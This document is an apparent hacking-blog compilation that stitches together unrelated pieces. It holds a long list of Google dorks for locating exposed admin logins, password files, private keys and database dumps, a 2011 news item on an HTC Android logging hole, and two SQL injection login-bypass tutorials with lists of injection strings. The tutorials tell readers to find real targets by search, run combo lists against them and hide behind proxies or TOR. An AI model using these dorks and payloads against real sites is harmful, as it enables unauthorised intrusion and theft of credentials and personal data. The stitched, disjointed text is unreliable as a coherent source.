nurl:/admin/login.asp
inurl:/cgi-bin/sqwebmail?noframes=1
inurl:/Citrix/Nfuse17/
inurl:/dana-na/auth/welcome.html
inurl:/eprise/
inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:"Miva Merchant Administration Login" -inurl:cheap-malboro.net
inurl:/modcp/ intext:Moderator+vBulletin
inurl:/SUSAdmin intitle:"Microsoft Software upd?t? Services"
inurl:/webedit.* intext:WebEdit Professional -html
inurl:1810 "Oracle Enterprise Manager"
inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com
inurl::2082/frontend -demo
inurl:administrator "welcome to mambo"
inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0
inurl:cgi-bin/ultimatebb.cgi?ubb=login
inurl:Citrix/MetaFrame/default/default.aspx
inurl:confixx inurl:login|anmeldung
inurl:coranto.cgi intitle:Login (Authorized Users Only)
inurl:csCreatePro.cgi
inurl:default.asp intitle:"WebCommander"
inurl:exchweb/bin/auth/owalogon.asp
inurl:gnatsweb.pl
inurl:ids5web
inurl:irc filetype:cgi cgi:irc
inurl:login filetype:swf swf
inurl:login.asp
inurl:login.cfm
inurl:login.php "SquirrelMail version"
inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"
inurl:mewebmail
inurl:names.nsf?opendatabase
inurl:ocw_login_username
inurl:orasso.wwsso_app_admin.ls_login
inurl:postfixadmin intitle:"postfix admin" ext:php
inurl:search/admin.php
inurl:textpattern/index.php
inurl:WCP_USER
inurl:webmail./index.pl "Interface"
inurl:webvpn.html "login" "Please enter your"
Login ("
Jetbox One CMS â?¢" | "
Jetstream ? *")
Novell NetWare intext:"netware management portal version"
Outlook Web Access (a better way)
PhotoPost PHP Upload
PHPhotoalbum Statistics
PHPhotoalbum Upload
phpWebMail
Please enter a valid password! inurl:polladmin

INDEXU
Ultima Online loginservers
W-Nailer Upload Area
intitle:"DocuShare" inurl:"docushare/dsweb/" -faq -gov -edu
"#mysql dump" filetype:sql
"#mysql dump" filetype:sql 21232f297a57a5a743894a0e4a801fc3
"allow_call_time_pass_reference" "PATH_INFO"
"Certificate Practice Statement" inurl:(PDF | DOC)
"Generated by phpSystem"
"generated by wwwstat"
"Host Vulnerability Summary Report"
"HTTP_FROM=googlebot" googlebot.com "Server_Software="
"Index of" / "chat/logs"
"Installed Objects Scanner" inurl:default.asp
"MacHTTP" filetype:log inurl:machttp.log
"Mecury Version" "Infastructure Group"
"Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)" ext:log
"Most Submitted Forms and s?ri?ts" "this section"
"Network Vulnerability Assessment Report"
"not for distribution" confidential
"not for public release" -.edu -.gov -.mil
"phone * * *" "address *" "e-mail" intitle:"curriculum vitae"
"phpMyAdmin" "running on" inurl:"main.php"
"produced by getstats"
"Request Details" "Control Tree" "Server Variables"
"robots.txt" "Disallow:" filetype:txt
"Running in Child mode"
"sets mode: +p"
"sets mode: +s"
"Thank you for your order" +receipt
"This is a Shareaza Node"
"This report was generated by WebLog"
( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject
(intitle:"PRTG Traffic Grapher" inurl:"allsensors")|(intitle:"PRTG Traffic Grapher - Monitoring Results")
(intitle:WebStatistica inurl:main.php) | (intitle:"WebSTATISTICA server") -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob
(inurl:"robot.txt" | inurl:"robots.txt" ) intext:disallow filetype:txt
+":8080" +":3128" +":80" filetype:txt
+"HSTSNR" -"netop.com"
-site:php.net -"The PHP Group" inurl:source inurl:url ext:pHp
94FBR "ADOBE PHOTOSHOP"
AIM buddy lists
allinurl:/examples/jsp/snp/snoop.jsp
allinurl:cdkey.txt
allinurl:servlet/SnoopServlet
cgiirc.conf
cgiirc.conf
contacts ext:wml
data filetype:mdb -site:gov -site:mil
exported email addresses
ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:"budget approved") inurl:confidential
ext:asp inurl:pathto.asp
ext:ccm ccm -catacomb
ext:CDX CDX
ext:cgi inurl:editcgi.cgi inurl:file=
ext:conf inurl:rsyncd.conf -cvs -man
ext:conf NoCatAuth -cvs
ext:dat bpk.dat
ext:gho gho
ext:ics ics
ext:ini intext:env.ini
ext:jbf jbf
ext:ldif ldif
ext:log "Software: Microsoft Internet Information Services *.*"
ext:mdb inurl:*.mdb inurl:fpdb shop.mdb
ext:nsf nsf -gov -mil
ext:plist filetype:plist inurl:bookmarks.plist
ext:pqi pqi -database
ext:reg "username=*" putty
ext:txt "Final encryption key"
ext:txt inurl:dxdiag
ext:vmdk vmdk
ext:vmx vmx
filetype:asp DBQ=" * Server.MapPath("*.mdb")
filetype:bkf bkf
filetype:blt "buddylist"
filetype:blt blt +intext:screenname
filetype:cfg auto_inst.cfg
filetype:cnf inurl:_vti_pvt access.cnf
filetype:conf inurl:firewall -intitle:cvs
filetype:config web.config -CVS
filetype:ctt Contact
filetype:ctt ctt messenger
filetype:eml eml +intext:"Subject" +intext:"From" +intext:"To"
filetype:fp3 fp3
filetype:fp5 fp5 -site:gov -site:mil -"cvs log"
filetype:fp7 fp7
filetype:inf inurl:capolicy.inf
filetype:lic lic intext:key
filetype:log access.log -CVS
filetype:log cron.log
filetype:mbx mbx intext:Subject
filetype:myd myd -CVS
filetype:ns1 ns1
filetype:ora ora
filetype:ora tnsnames
filetype:pdb pdb backup (Pilot | Pluckerdb)
filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net
filetype:pot inurl:john.pot
filetype:PS ps
filetype:pst inurl:"outlook.pst"
filetype:pst pst -from -to -date
filetype:qbb qbb
filetype:QBW qbw
filetype:rdp rdp
filetype:reg "Terminal Server Client"
filetype:vcs vcs
filetype:wab wab
filetype:xls -site:gov inurl:contact
filetype:xls inurl:"email.xls"
Financial spreadsheets: finance.xls
Financial spreadsheets: finances.xls
Ganglia Cluster Reports
haccess.ctl (one way)
haccess.ctl (VERY reliable)
ICQ chat logs, please...
intext:"Session Start * * * *:*:* *" filetype:log
intext:"Tobias Oetiker" "traffic analysis"
intext:(password | passcode) intext:(username | userid | user) filetype:csv
intext:gmail invite intext:http://gmail.google.com/gmail/a
intext:SQLiteManager inurl:main.php
intext:ViewCVS inurl:Settings.php
intitle:"admin panel" +"
RedKernel"
intitle:"Apache::Status" (inurl:server-status | inurl:status.html | inurl:apache.html)
intitle:"AppServ Open Project" -site:www.appservnetwork.com
intitle:"ASP Stats Generator *.*" "ASP Stats Generator" "2003-2004 weppos"
intitle:"Big Sister" +"OK Attention Trouble"
intitle:"curriculum vitae" filetype:doc
intitle:"edna:streaming mp3 server" -forums
intitle:"FTP root at"
intitle:"index of" +myd size
intitle:"Index Of" -inurl:maillog maillog size
intitle:"Index Of" cookies.txt size
intitle:"index of" mysql.conf OR mysql_config
intitle:"Index of" upload size parent directory
intitle:"index.of *" admin news.asp configview.asp
intitle:"index.of" .diz .nfo last modified
intitle:"Joomla - Web Installer"
intitle:"LOGREP - Log file reporting system" -site:itefix.no
intitle:"Multimon UPS status page"
intitle:"PHP Advanced Transfer" (inurl:index.php | inurl:showrecent.php )
intitle:"PhpMyExplorer" inurl:"index.php" -cvs
intitle:"statistics of" "advanced web statistics"
intitle:"System Statistics" +"System and Network Information Center"
intitle:"urchin (5|3|admin)" ext:cgi
intitle:"Usage Statistics for" "Generated by Webalizer"
intitle:"wbem" compaq login "Compaq Information Technologies Group"
intitle:"Web Server Statistics for ****"
intitle:"web server status" SSH Telnet
intitle:"Welcome to F-Secure Policy Manager Server Welcome Page"
intitle:"welcome.to.squeezebox"
intitle:admin intitle:login
intitle:Bookmarks inurl:bookmarks.html "Bookmarks
intitle:index.of "Apache" "server at"
intitle:index.of cleanup.log
intitle:index.of dead.letter
intitle:index.of inbox
intitle:index.of inbox dbx
intitle:index.of ws_ftp.ini
intitle:intranet inurl:intranet +intext:"phone"
inurl:"/axs/ax-admin.pl" -s?ri?t
inurl:"/cricket/grapher.cgi"
inurl:"bookmark.htm"
inurl:"cacti" +inurl:"graph_view.php" +"Settings Tree View" -cvs -RPM
inurl:"newsletter/admin/"
inurl:"newsletter/admin/" intitle:"newsletter admin"
inurl:"putty.reg"
inurl:"smb.conf" intext:"workgroup" filetype:conf conf
inurl:*db filetype:mdb
inurl:/cgi-bin/pass.txt
inurl:/_layouts/settings
inurl:admin filetype:xls
inurl:admin intitle:login
inurl:backup filetype:mdb
inurl:build.err
inurl:cgi-bin/printenv
inurl:cgi-bin/testcgi.exe "Please distribute TestCGI"
inurl:changepassword.asp
inurl:ds.py
inurl:email filetype:mdb
inurl:fcgi-bin/echo
inurl:forum filetype:mdb
inurl:forward filetype:forward -cvs
inurl:getmsg.html intitle:hotmail
inurl:log.nsf -gov
inurl:main.php phpMyAdmin
inurl:main.php Welcome to phpMyAdmin
inurl:netscape.hst
inurl:netscape.hst
inurl:netscape.ini
inurl:odbc.ini ext:ini -cvs
inurl:perl/printenv
inurl:php.ini filetype:ini
inurl:preferences.ini "[emule]"
inurl:profiles filetype:mdb
inurl:report "EVEREST Home Edition "
inurl:server-info "Apache Server Information"
inurl:server-status "apache"
inurl:snitz_forums_2000.mdb
inurl:ssl.conf filetype:conf
inurl:tdbin
inurl:vbstats.php "page generated"
inurl:wp-mail.php + "There doesn't seem to be any new mail."
inurl:XcCDONTS.asp
ipsec.conf
ipsec.secrets
ipsec.secrets
Lotus Domino address books
mail filetype:csv -site:gov intext:name
Microsoft Money Data Files
mt-db-pass.cgi files
MySQL tabledata dumps
mystuff.xml - Trillian data files
OWA Public Folders (direct view)
Peoples MSN contact lists
php-addressbook "This is the addressbook for *" -warning
phpinfo()
phpMyAdmin dumps
phpMyAdmin dumps
private key files (.csr)
private key files (.key)
Quicken data files
rdbqds -site:.edu -site:.mil -site:.gov
robots.txt
site:edu admin grades
site:www.mailinator.com inurl:ShowMail.do
SQL data dumps
Squid cache server reports
Unreal IRCd
WebLog Referrers
Welcome to ntop!
Fichier contenant des informations sur le r?seau :
filetype:log intext:"ConnectionManager2"
"apricot - admin" 00h
"by Reimar Hoven. All Rights Reserved. Disclaimer" | inurl:"log/logdb.dta"
"Network Host Assessment Report" "Internet Scanner"
"Output produced by SysWatch *"
"Phorum Admin" "Database Connection" inurl:forum inurl:admin
phpOpenTracker" Statistics
"powered | performed by Beyond Security's Automated Scanning" -kazaa -example
"Shadow Security Scanner performed a vulnerability assessment"
"SnortSnarf alert page"
"The following report contains confidential information" vulnerability -search
"The statistics were last upd?t?d" "Daily"-microsoft.com
"this proxy is working fine!" "enter *" "URL***" * visit
"This report lists" "identified by Internet Scanner"
"Traffic Analysis for" "RMON Port * on unit *"
"Version Info" "Boot Version" "Internet Settings"
((inurl:ifgraph "Page generated at") OR ("This page was built using ifgraph"))
Analysis Console for Incident Databases
ext:cfg radius.cfg
ext:cgi intext:"nrg-" " This web page was created on "
filetype:pdf "Assessment Report" nessus
filetype:php inurl:ipinfo.php "Distributed Intrusion Detection System"
filetype:php inurl:nqt intext:"Network Query Tool"
filetype:vsd vsd network -samples -examples
intext:"Welcome to the Web V.Networks" intitle:"V.Networks [Top]" -filetype:htm
intitle:"ADSL Configuration page"
intitle:"Azureus : Java BitTorrent Client Tracker"
intitle:"Belarc Advisor Current Profile" intext:"Click here for Belarc's PC Management products, for large and small companies."
intitle:"BNBT Tracker Info"
intitle:"Microsoft Site Server Analysis"
intitle:"Nessus Scan Report" "This file was generated by Nessus"
intitle:"PHPBTTracker Statistics" | intitle:"PHPBT Tracker Statistics"
intitle:"Retina Report" "CONFIDENTIAL INFORMATION"
intitle:"start.managing.the.device" remote pbx acc
intitle:"sysinfo * " intext:"Generated by Sysinfo * written by The Gamblers."
intitle:"twiki" inurl:"TWikiUsers"
inurl:"/catalog.nsf" intitle:catalog
inurl:"install/install.php"
inurl:"map.asp?" intitle:"WhatsUp Gold"
inurl:"NmConsole/Login.asp" | intitle:"Login - Ipswitch WhatsUp Professional 2005" | intext:"Ipswitch WhatsUp Professional 2005 (SP1)" "Ipswitch, Inc"
inurl:"sitescope.html" intitle:"sitescope" intext:"refresh" -demo
inurl:/adm-cfgedit.php
inurl:/cgi-bin/finger? "In real life"
inurl:/cgi-bin/finger? Enter (account|host|user|username)
inurl:/counter/index.php intitle:"+PHPCounter 7.*"
inurl:CrazyWWWBoard.cgi intext:"detailed debugging information"
inurl:login.jsp.bak
inurl:ovcgi/jovw
inurl:phpSysInfo/ "created by phpsysinfo"
inurl:portscan.php "from Port"|"Port Range"
inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl
inurl:statrep.nsf -gov
inurl:status.cgi?host=all
inurl:testcgi xitami
inurl:webalizer filetype:png -.gov -.edu -.mil -opendarwin
inurl:webutil.pl
Looking Glass
site:netcraft.com intitle:That.Site.Running Apache
"A syntax error has occurred" filetype:ihtml
"access denied for user" "using password"
"An illegal character has been found in the statement" -"previous message"
"ASP.NET_SessionId" "data source="
"Can't connect to local" intitle:warning
"Chatologica MetaSearch" "stack tracking"
"detected an internal error [IBM][CLI Driver][DB2/6000]"
"error found handling the request" cocoon filetype:xml
"Fatal error: Call to undefined function" -reply -the -next
"Incorrect syntax near"
"Incorrect syntax near"
"Internal Server Error" "server at"
"Invision Power Board Database Error"
"ORA-00933: SQL command not properly ended"
"ORA-12541: TNS:no listener" intitle:"error occurred"
"Parse error: parse error, unexpected T_VARIABLE" "on line" filetype:php
"PostgreSQL query failed: ERROR: parser: parse error"
"Supplied argument is not a valid MySQL result resource"
"Syntax error in query expression " -the
"The s?ri?t whose uid is " "is not allowed to access"
"There seems to have been a problem with the" " Please try again by clicking the Refresh button in your web browser."
"Unable to jump to row" "on MySQL result index" "on line"
"Unclosed quotation mark before the character string"
"Warning: Bad arguments to (join|implode) () in" "on line" -help -forum
"Warning: Cannot modify header information - headers already sent"
"Warning: Division by zero in" "on line" -forum

"Warning: mysql_connect(): Access denied for user: '*@*" "on line" -help -forum
"Warning: mysql_query()" "invalid query"
"Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL"
"Warning: Supplied argument is not a valid File-Handle resource in"
"Warning:" "failed to open stream: HTTP request failed" "on line"
"Warning:" "SAFE MODE Restriction in effect." "The s?ri?t whose uid is" "is not allowed to access owned by uid 0 in" "on line"
"SQL Server Driver][SQL Server]Line 1: Incorrect syntax near"
An unexpected token "END-OF-STATEMENT" was found
Coldfusion Error Pages
filetype:asp + "[ODBC SQL"
filetype:asp "Custom Error Message" Category Source
filetype:log "PHP Parse error" | "PHP Warning" | "PHP Error"
filetype:php inurl:"logging.php" "Discuz" error
ht://Dig htsearch error
IIS 4.0 error messages
IIS web server error messages
Internal Server Error
intext:"Error Message : Error loading required libraries."
intext:"Warning: Failed opening" "on line" "include_path"
intitle:"Apache Tomcat" "Error Report"
intitle:"Default PLESK Page"
intitle:"Error Occurred While Processing Request" +WHERE (SELECT|INSERT) filetype:cfm
intitle:"Error Occurred" "The error occurred in" filetype:cfm
intitle:"Error using Hypernews" "Server Software"
intitle:"Execution of this s?ri?t not permitted"
intitle:"Under construction" "does not currently have"
intitle:Configuration.File inurl:softcart.exe
MYSQL error message: supplied argument....
mysql error with query
Netscape Application Server Error page
ORA-00921: unexpected end of SQL command
ORA-00921: unexpected end of SQL command
ORA-00936: missing expression
PHP application warnings failing "include_path"
sitebuildercontent
sitebuilderfiles
sitebuilderpictures
Snitz! forums db path error
SQL syntax error
Supplied argument is not a valid PostgreSQL result
warning "error on line" php sablotron
Windows 2000 web server error messages
"ftp://" "www.eastgame.net"
"html allowed" guestbook
: vBulletin Version 1.1.5"
"Select a database to view" intitle:"filemaker pro"
"set up the administrator user" inurl:pivot
"There are no Administrators Accounts" inurl:admin.php -mysql_fetch_row
"Welcome to Administration" "General" "Local Domains" "SMTP Authentication" inurl:admin
"Welcome to Intranet"
"Welcome to PHP-Nuke" congratulations
"Welcome to the Prestige Web-Based Configurator"
"YaBB SE Dev Team"
"you can now password" | "this is a special page only seen by you. your profile visitors" inurl:imchaos
("Indexed.By"|"Monitored.By") hAcxFtpScan
(inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)
allinurl:"index.php" "site=sglinks"
allinurl:install/install.php
allinurl:intranet admin
filetype:cgi inurl:"fileman.cgi"
filetype:cgi inurl:"Web_Store.cgi"
filetype:php inurl:vAuthenticate
filetype:pl intitle:"Ultraboard Setup"
Gallery in configuration mode
Hassan Consulting's Shopping Cart Version 1.18
intext:"Warning: * am able * write ** configuration file" "includes/configure.php" -
intitle:"Gateway Configuration Menu"
intitle:"Horde :: My Portal" -"[Tickets"
intitle:"Mail Server CMailServer Webmail" "5.2"
intitle:"MvBlog powered"
intitle:"Remote Desktop Web Connection"
intitle:"Samba Web Administration Tool" intext:"Help Workgroup"
intitle:"Terminal Services Web Connection"
intitle:"Uploader - Uploader v6" -pixloads.com
intitle:osCommerce inurl:admin intext:"redistributable under the GNU" intext:"Online Catalog" -demo -site:oscommerce.com
intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"
intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"
inurl:"/NSearch/AdminServlet"
inurl:"index.php? module=ew_filemanager"
inurl:aol*/_do/rss_popup?blogID=
inurl:footer.inc.php
inurl:info.inc.php
inurl:ManyServers.htm
inurl:newsdesk.cgi? inurl:"t="
inurl:pls/admin_/gateway.htm
inurl:rpSys.html
inurl:search.php vbulletin
inurl:servlet/webacc
natterchat inurl:home.asp -site:natterchat.co.uk
XOOPS Custom Installation
inurl:htpasswd filetype:htpasswd
inurl:yapboz_detay.asp + View Webcam User Accessing
allinurl:control/multiview
inurl:"ViewerFrame?Mode="
intitle:"WJ-NT104 Main Page"
inurl:netw_tcp.shtml
intitle:"supervisioncam protocol"

Security Holes in Android HTC phones.

A security hole found in some HTC Android phones could give apps with Internet permissions access to information like a user’s location and their text messages, Android Police reported today. The vulnerability is part of HTC’s Sense UI and affects a subset of the brand’s most popular phones, including the HTC Thunderbolt and the EVO 4G.

The affected HTC phones have an application package titled HTCLoggers.apk installed with root-level access. Apps with Internet permissions can access HTCLoggers.apk, which provides access to information like GPS data, WiFi network data, memory info, running processes, SMS data (including phone numbers and encoded text), and system logs that can include information like e-mail addresses and phone numbers.

When called upon, the logging program opens a local port that will provide this data to any app that asks for it. Apps can send the data off to a remote server for safekeeping, as shown by a proof-of-concept app that Android Police researchers developed.

The authors note that the flaw can’t be fixed in the stock Sense UI without an update or patch from HTC. The owners of the relevant phones (a partial list: Thunderbolt, EVO 3D, EVO 4G, EVO Shift 4G) can delete HTCLoggers from their devices if they root the phones.

While the report doesn’t note any concrete examples of nefarious use of the HTCLogger data, this is far more access than Google allows via Android by default—typically, the OS doesn’t let information of this type off a device without direct consent. HTC has made no official reply to inquiries from the researchers, and did not respond immediately to Ars’ requests for comment. 

By Casey Johnston | Published October 2, 2011 7:50 PM

The DBA darkLord of All

SQL injection ()

a basic Login SQL injection tutorial

by ComSec aka ZSL

5 june 2003

One of the major problems with SQL is its poor security issues surrounding is the login and url strings.

this tutorial is not going to go into detail on why these string work as am not a coder i just know what i know and it works

SEARCH:

admin\login.asp
login.asp

with these two search string you will have plenty of targets to chose from...finding one thats vulnerable is another question


WHAT I DO :

first let me go into details on how i go about my research

i have gathered plenty of injection strings for quite some time like these below and have just been granted access to a test machine and will be testing for many variations and new inputs...legally cool...provided by my good friend Gsecur aka ICE..also an Astal member.. http://governmentsecurity.org "thanks mate" .. gives me a chance to concentrate on what am doing and not be looking over my shoulder

INJECTION STRINGS:HOW ?

this is the easiest part...very simple

on the login page just enter something like

user:admin (you dont even have to put this.)
pass:' or 1=1--

or

user:' or 1=1--
admin:' or 1=1--

some sites will have just a password so

password:' or 1=1--

infact i have compiled a combo list with strings like this to use on my chosen targets ....there are plenty of strings about , the list below is a sample of the most common used

there are many other strings involving for instance UNION table access via reading the error pages table structure
thus an attack with this method will reveal eventually admin U\P paths...but thats another paper

the one am interested in are quick access to targets

PROGRAM

i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit
of success with a combo list formatted this way,yesteday i loaded 40 eastern targets with 18 positive hits in a few minutes
how long would it take to go thought 40 sites cutting and pasting each string ??

combo example:

admin:' or a=a--
admin:' or 1=1--

and so on...it dont have to be admin can be anything you want... the most important part is example:' or 1=1-- this is our injection
string

now the only trudge part is finding targets to exploit...so i tend to search say google for login.asp or whatever

inurl:login.asp
index of:/admin/login.asp

like this: index of login.asp

result:

http://www3.google.c...G=Google+Search

17,000 possible targets trying various searches spews out plent more


now using proxys set in my browser i then click through interesting targets...seeing whats what on the site pages if interesting
i then cut and paste url as a possible target...after an hour or so you have a list of sites of potential targets like so

http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp

and so on...in a couple of hours you can build up quite a list...reason i dont sellect all results or spider for login pages is
i want to keep the noise level low...my ISP.. well enough said...plus atm am on dial-up so to slow for me

i then save the list fire up Ares and enter (1) a proxy list (2)my target IP list (3)my combo list...start..now i dont want to go into
problems with users using Ares..thing is i know it works for me...

sit back and wait...any target vulnerable with show up in the hits box...now when it finds a target it will spew all the strings on that site as vulnerable...you have to go through each one on the site by cutting and pasting the string till you find the right one..but the thing is you know you CAN access the site ...really i need a program that will return the hit with a click on url and ignore false outputs

am still looking....thing is it saves quite a bit of time going to each site and each string to find its not exploitable.

there you go you should have access to your vulnerable target by now

another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1=1-- so it becomes

user=' or 1=1-- just as quick as login process


(Variations)

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

Mirror Websites with HTTrack

Monday, September 12th, 2011 from Hak5.org

GOAL: 
Download a copy of any website and host it locally with a one-line web server.  You can also use this for backing up a website, doing some prototyping.  The dark side most likely use might use this technique in building their phishing sites.

MATERIALS:
HTTrack.- Available for Windows, Mac and Linux this open source, multilingual mirroring tool sports multiple web targets, user selectable recursion levels, resume features and more.


STEP-BY-STEP:
1. Begin by creating a directory to store the website mirror.
Example:  mkdir ~/websites and cd !$

2. Run httrack. Once you get familiar with the tool you can automate the process with flags and such, but the straight forward interactive wizard is much appreciated.

3. Start by naming the project, then provide a directory to save the files and the URL of your website or websites separated by commas or spaces. Finally we'll choose how we'd like to download. I prefer option 2, mirroring the web site with the wizard.

4. We can specify if we're using a proxy, what filetypes we would like, and any additional options. Finally we're provided with a command line so that next time we can perform the same action without the prompts.
Example: httrack -W -O /path -%v

5. Hit Y for Yes and the process will complete in just a moment, or maybe longer depending on the size of the site and how recursive you want to get. Finally we can see our finished work with ls. You'll notice HTTrack creates a a log and cache directory and all of the saved files will be found in your website directory.  


6. With our site newly mirrored and the html files sitting happily in our directory we can actually browse to them with a webserver locally in one command.  
Issue: python -m SimpleHTTPServer 
A webserver will be spawned serving up your current working directory on port 8000. Now we can head over to our web browser and check out http://localhost:8000 to see our finished product.

Webagedon - Dark Lord of All!

SQL Injection Strings:
1. Google search "admin login.asp" - be creative, use Google hacking tips to "fine tune" your searches.

2. On the results, pick interesting subjects.

3. at this time you should think about hiding your identity.  Look into Proxy servers available on the internet:
www.youhide.com
https://kproxy.com/
 -or you might want to invest some time with TOR.

4. After you have verified that you can not be identified, you can then proceed with your academic endeavor.

SQL Strings you can try:
username: admin
password: 1'or'1'='1

SQL Injection 101, Login tricks

• admin' --
• admin' #
• admin'/*
• ' or 1=1--
• ' or 1=1#
• ' or 1=1/*
• ') or '1'='1--
• ') or ('1'='1--

more...

admin'--
' or 1=1--
'" or 1=1--
' union select 1, 'Eyeless', 'ez2do', 1--
admin'--
administrator'--
superuser'--
test'--
' or 0=0 --
' or 0=0 --'
' or 0=0 #
" or 0=0 --
" or 0=0 --'
'" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
" or 1=1--
or 1=1--
' or a=a--'
' or a=a #
' or a=a--
' or "a"="a
' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a to come later...